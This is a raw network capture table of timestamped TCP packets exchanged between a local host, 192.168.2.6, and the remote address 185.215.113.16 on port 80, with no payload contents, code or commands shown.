                                                                                                                                                                              Nov 21, 2024 08:30:38.893709898 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.894422054 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.894488096 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.894568920 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.895231009 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.895282984 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.895370960 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.896109104 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.896161079 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.896243095 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.896868944 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.896924019 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.897008896 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.897685051 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.897743940 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.897794008 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.898552895 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.898587942 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.898638964 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.899311066 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.899389029 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.899457932 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.900135040 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.900183916 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.900279999 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.900954962 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.901002884 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.901052952 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.901789904 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.901853085 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.901932955 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.902604103 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.902663946 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.902698994 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.903422117 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.903484106 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.903536081 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.904217005 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.904280901 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.904319048 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.905035019 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.905096054 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.905154943 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.905862093 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.905967951 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.905975103 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.906682014 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.906752110 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.906819105 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.907573938 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.907629967 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.907684088 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.908332109 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.908379078 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.908463001 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.909240007 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.909275055 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.909302950 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.909953117 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.910003901 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.910075903 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.910778046 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.910837889 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.910897017 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.911607981 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.911669016 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.911737919 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.912482023 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.912530899 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.912674904 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.913819075 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.913853884 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.913880110 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.914025068 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.914129019 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.914133072 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.914860010 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.914921045 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.914973974 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.915676117 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.915730000 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.915779114 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.916515112 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.916565895 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.916631937 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.917346001 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.917399883 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.917484045 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.918148994 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.918207884 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.918256044 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.918967962 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.919032097 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.919081926 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.919913054 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.920028925 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.920039892 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.920572042 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.920722961 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.920758009 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.921386003 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.921454906 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.921516895 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.922202110 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.922262907 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.922332048 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.923017025 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.923098087 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.923131943 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.923866034 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.923913956 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.923973083 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.924679041 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.924760103 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.924807072 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.925513983 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.925561905 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.925681114 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.926330090 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.926390886 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.926429987 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.927153111 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.927206993 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.927263021 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.927949905 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.927998066 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.928025007 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.928802013 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.928870916 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.928967953 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.929589987 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.929636955 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.929694891 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.930438995 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.930494070 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.930525064 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.931230068 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.931293964 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.931375980 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.932013988 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.932070017 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.932136059 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.932837963 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.932943106 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.932991982 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.092300892 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.092390060 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.092459917 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.092641115 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.092744112 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.092895031 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.093413115 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.093524933 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.093638897 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.094218969 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.094331026 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.094383001 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.095030069 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.095163107 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.095248938 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.095833063 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.095987082 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.096050024 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.096649885 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.096774101 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.096937895 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.097476006 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.097599030 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.097657919 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.098309040 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.098416090 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.098469019 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.099109888 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.099262953 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.099339008 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.099940062 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.100052118 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.100131035 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.100913048 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.101038933 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.101093054 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.101604939 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.101660013 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.101711988 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.102389097 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.102509975 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.102572918 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.103236914 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.103348970 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.103570938 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.104031086 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.104089022 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.104162931 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.104862928 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.104996920 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.105046988 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.105678082 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.105823040 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.105882883 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.106462955 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.106570005 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.106669903 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.107275963 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.107409000 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.107467890 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.108105898 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.108242989 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.108300924 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.108952999 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.109055996 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.109118938 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.109750032 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.109862089 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.109910965 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.110577106 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.110681057 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.110871077 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.111397028 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.111531973 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.111586094 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.112221956 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.112277031 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.112334013 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.113020897 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.113121986 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.113229990 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.113850117 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.113951921 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.114001036 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.114624023 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.114758015 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.114867926 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.115494013 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.115600109 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.115653038 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.116306067 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.116426945 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.116512060 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.117130041 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.117191076 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.117269039 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.117942095 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.118072987 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.118206978 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.118746042 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.118918896 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.118974924 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.119548082 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.119683981 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.119860888 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.120428085 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.120616913 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.120699883 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.121185064 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.121308088 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.121587038 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.121999979 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.122108936 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.122147083 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.122823000 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.122971058 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.123023033 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.123646021 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.123739004 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.123801947 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.124464035 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.124583006 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.124627113 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.125257015 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.125374079 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.125534058 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.126089096 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.126137018 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.126224995 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.126929998 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.127032042 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.127079010 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.127733946 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.127829075 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.127907991 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.128563881 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.128694057 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.128783941 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.129352093 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.129507065 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.129904985 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.130224943 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.130357981 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.130403042 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.130980015 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.131092072 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.131278992 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:39.131818056 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:39.131927967 CET8049762185.215.113.16192.168.2.6
